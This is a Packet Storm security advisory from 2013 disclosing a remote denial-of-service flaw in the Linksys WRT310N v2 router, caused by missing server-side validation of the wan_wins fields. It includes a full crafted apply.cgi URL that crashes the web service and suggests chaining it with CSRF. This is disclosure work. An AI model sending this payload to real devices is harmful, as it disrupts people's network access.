what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cisco Linksys WRT310N 2.0.00 Denial Of Service

Cisco Linksys WRT310N 2.0.00 Denial Of Service
Posted Apr 24, 2013
Authored by Carl Benedict

Cisco Linksys WRT310N version 2.0.00 suffers from a remote denial of service vulnerability.

tags | exploit, remote, denial of service
systems | cisco
SHA-256 | 96c706f91c3a5f744fbbc0b57a7b74560a10053170e63931f5e7a21c6402b759

Cisco Linksys WRT310N 2.0.00 Denial Of Service

Change Mirror Download
Summary
--------------------
Software : Cisco/Linksys Router OS
Hardware : WRT310N v2 (others currently untested)
Version : 2.0.00 (others currently untested)
Website : http://www.linksys.com
Issue : Remote Denial of Service
Severity : High
Researcher: Carl Benedict (theinfinitenigma)

Product Description
--------------------
The Cisco/Linksys WRT310N v2 is a consumer-grade router, wireless access point, and gigabit switch.

Details
--------------------
The HTTP service on this device is vulnerable to a remote denial of service condition via multiple parameters in the 'setup' form of index.asp.

wan_wins_0
wan_wins_1
wan_wins_2
wan_wins_3

These inputs expect fixed-length data in the format of an IP address octet (numbers 0 - 255). While client-side protections are in place, no input validation on the server side is performed. One can leverage other vulnerabilities reported in this platform (XSS and CSRF) to exacerbate this issue. The page 'apply.cgi' allows HTML forms to be submitted via both HTTP POST and HTTP GET requests. The following crafted link can be used to pass a value greater than 18 bytes in one of the above-mentioned paramaters causing the HTTP service to stop responding.

http://192.168.1.1/apply.cgi?pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=dhcp&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=255.255.255.0&url_address=my.wrt310n&lan_proto=dhcp&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=AAAAAAAAAAAAAAAAAAA&time_zone=-08+1+1&_daylight_time=1

The service will stop responding and become inaccessible for several minutes. After a few minutes, it appears that an automated task such as a CRON job restarts the service.

Authentication is required to perform this action. The application uses HTTP Basic Authentication, which is weak (base64-encoded credentials in the format of username:password).

History
--------------------
04/16/2013 : Discovery
04/23/2013 : Advisory released

References
--------------------
Cisco/Linksys WRT310N v2 XSS: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-3067
Cisco/Linksys WRT310N v2 CSRF: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3068
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close